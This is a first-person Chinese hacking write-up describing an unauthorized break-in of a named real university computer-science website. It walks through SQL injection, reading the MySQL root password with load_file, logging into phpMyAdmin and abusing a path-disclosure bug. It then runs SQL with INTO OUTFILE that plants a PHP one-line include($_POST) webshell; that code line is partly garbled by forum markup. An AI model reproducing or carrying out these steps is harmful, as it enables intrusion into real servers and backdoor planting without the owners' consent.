2008年我就要走进高考的考场,现在也该计划一下去哪个大学了,对我这样疯狂喜欢黑客技术的人当然要学信息安全了。武汉大学的信息安全系在全国可是数一数二的,我可是做梦都想去,但是凭我的成绩想去武汉大学比买彩票中头奖的几率还小,不过我倒是想看看能不能在它的网站上找出点儿漏洞,嘿嘿^_^。
既然它以信息安全出名,我就拿它的计算机学院开刀吧。网页以PHP为主,随便点了几个链接,用了防注入工具,常用的方法都不能绕过,后来通过百度,终于找到了一处,当访问
http://cs.whu.edu.cn/images的时候,竟然暴出了绝对路径,如图1。
后来又试了试几处链接,当试到
http://cs.whu.edu.cn/thesis/admin.php?act=keti.all&sys=1&zyid=6这个地址时,在后面分别加上and 1=1
和and 1=2返回结果不同,确定存在注入。先看看能不能load_file,拿出幻影旅团的PHP注入工具,填上注入点,由于在地址后面加and 1=2发现返回的页面没有正常页面中“三维展示科技”这几个字,所以判断字符串就把这几个字填上,并发线程根据自己电脑配置而定,这里我填的是20,路径处就填存在注入文件admin.php的绝对路径,填好后如图2所示,
点击“快速读取”,一会儿就弹出了图3的对话框,
看来有戏了,点“确定”后又过了一会儿就看到了返回结果,哈哈,把root的密码读出来了。
现在到了这步,也许有的朋友会想到直接用mysql连接器连接,但是由于mysql默认是不能连接数据库的,因此这条路我们放弃。网站既然是PHP的,那就试一下phpmyadmin吧,直接在网址后面加上phpmyadmin,弹出了登陆页面,填上刚才得到的root用户名和密码,语言选择简体中文,成功登陆,如图4。
这里提一下,phpmyadmin有一个Bug,访问libraries目录下的select_lang.lib.php文件会直接暴出绝对路径,如图5。
因此前面如果得不到网站根目录的话我们还可以通过phpmyadmin来暴出路径。
登陆成功后我们随便选择一个数据库,这里选择“11”,然后在sql语句中输入如下内容:
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<[email=?@include($_POST[]
?@include($_POST["hray"]);?>'[/email]);
select cmd from a into outfile '/wwwroot/csweb/phpmyadmin/libraries/1.php';
Drop TABLE IF EXISTS a;
执行后提示成功,拿出新型的ZV一句话客户端(向大家推荐,比较好用),连接一下,成功拿到了webshell,如图6。
好了,由于只是友情检测,拿到webshell就行了,况且我对Linux的系统不熟,提权就不必了。
本文没什么技术含量,想说的是目前国内的大部分管理员在安全上做的还不够好,一所名牌大学的计算机学院就这么轻易的被我拿到了webshell,因此大家一定要努力学习技术,以后为祖国的网络安全事业做出贡献,而不要做坏事哦!
